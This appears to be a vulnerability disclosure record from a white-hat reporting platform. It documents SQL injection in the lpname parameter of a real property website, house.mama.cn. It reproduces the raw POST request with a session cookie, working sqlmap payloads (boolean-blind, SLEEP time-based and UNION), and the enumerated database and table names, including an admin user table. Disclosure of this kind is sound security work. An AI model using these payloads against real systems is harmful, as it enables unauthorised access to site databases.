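2015-11-22: Details reported to the vendor; awaiting vendor response
2015-11-26: Vendor confirmed; details disclosed to the vendor only
2015-12-06: Details disclosed to core white hats and relevant domain experts
2015-12-16: Details disclosed to regular white hats
2015-12-26: Details disclosed to trainee white hats
2016-01-11: Details disclosed to the public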
RT
POST /index.php?a=index&&g=Loupan&m=Search HTTP/1.1
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://house.mama.cn
Cookie: PHPSESSID=1hva6rnsv4n5qbvd1bgms9kk45; liveCity=gz; xloginmama_service=http%253A%252F%252Fhouse.mama.cn; MAMADATA53=mama_rp=0&si=c0f92e0a5686619288df116ad6a96749&ltime=1448121306945&rtime=0&sinfid=1&sinpage=__&location=http%3A%2F%2Fhouse.mama.cn%2F; zbd10_Loupan-Search-index=1; zbd10_House-Index-index=1
Host: house.mama.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

areaid=&lpid=0&lpname=-1&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
The lpname parameter is vulnerable to SQL injection.
sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
---
Parameter: lpname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: areaid=&lpid=0&lpname=-7778') OR 6498=6498 AND ('qDIr'='qDIr&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: areaid=&lpid=0&lpname=-1') AND SLEEP(5) AND ('BjkF'='BjkF&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: areaid=&lpid=0&lpname=-1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786271,0x4d44627454694f5772506b7a7a626b446546735a6762665a52685358545573637a6562657a726c67,0x7171706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
---
web application technology: Nginx, PHP 5.3.27
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.6.23, logging enabled
banner:    '5.6.23-log'
web application technology: Nginx, PHP 5.3.27
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.6.23, logging enabled
banner:    '5.6.23-log'
available databases [11]:
[*] baby_grow
[*] home
[*] house_mamadb
[*] information_schema
[*] jiaju_del
[*] mama_living_expense
[*] mamaPhoto_del
[*] mysql
[*] performance_schema
[*] pinpai
[*] test
Database: house_mamadb
[46 tables]
+---------------------------+
| h_admin_user              |
| housesina_art             |
| housesina_art_1           |
| housewangyi_photo         |
| hs_category               |
| hs_category_config        |
| hs_city                   |
| hs_collect_data           |
| hs_collect_data_content   |
| hs_collect_rule           |
| hs_collect_source         |
| hs_collect_source_cate    |
| hs_edit_block             |
| hs_edit_block_bk20121103  |
| hs_edit_history           |
| hs_forum_house_thread     |
| hs_house_loupan_link_cate |
| hs_house_loupan_link_list |
| hs_house_tclink_cate      |
| hs_house_tclink_list      |
| hs_loupan                 |
| hs_loupan_developer       |
| hs_loupan_group           |
| hs_loupan_info            |
| hs_loupan_map             |
| hs_loupan_paihang         |
| hs_loupan_price           |
| hs_loupan_tongji          |
| hs_news                   |
| hs_news_20110908          |
| hs_news_cate              |
| hs_news_comments          |
| hs_news_hot               |
| hs_news_pic               |
| hs_news_tongji            |
| hs_news_tongji_detail     |
| hs_news_zt_cate           |
| hs_news_zt_list           |
| hs_photo_cate             |
| hs_photo_pic              |
| hs_photo_tongji           |
| hs_photo_tuku             |
| hs_sends                  |
| hs_tuan                   |
| hs_tuan_activity          |
| hs_tuan_activity_pic      |
+---------------------------+
Requesting a high rank...
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-26 22:58
Thank you very much.
None yet.